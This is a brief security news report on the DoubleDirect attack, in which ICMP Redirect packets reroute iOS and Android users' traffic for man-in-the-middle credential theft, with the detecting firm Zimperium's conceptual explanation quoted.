A new attack technique, known as DoubleDirect, enables an attacker to redirect a victim’s traffic to the attacker’s device. Once the victim is redirected, the hacker can gain access to the victims credentials and deliver malicious payloads to the victim’s mobile device that can not only quickly infect the device, but also spread throughout a corporate network.



Mobile security firm Zimperium has detected the attack against the customers of web giants including Google, Facebook, Live.com and Twitter, across 31 countries.



The DoubleDIrect attack focuses on either iOS or Android users. It does not affect users running Windows or Linux because their operating systems don't accept ICMP redirection packets that carry malicious traffic.



Zimperium explains the attack as follows:



DoubleDirect uses ICMP Redirect packets to modify routing tables of a host. This is legitimately used by routers to notify the hosts on the network that a better route is available for a particular destination. However, an attacker can also use ICMP Redirect packets to alter the routing tables on the victim host, causing the traffic to flow via an arbitrary network path for a particular IP.



As a result, the attacker can launch a MitM attack, redirecting the victim’s traffic to his device. Once redirected, the attacker can compromise the mobile device by chaining the attack with additional Client Side vulnerability (e.g: browser vulnerability), and in turn, provide an attacker with access to the corporate network.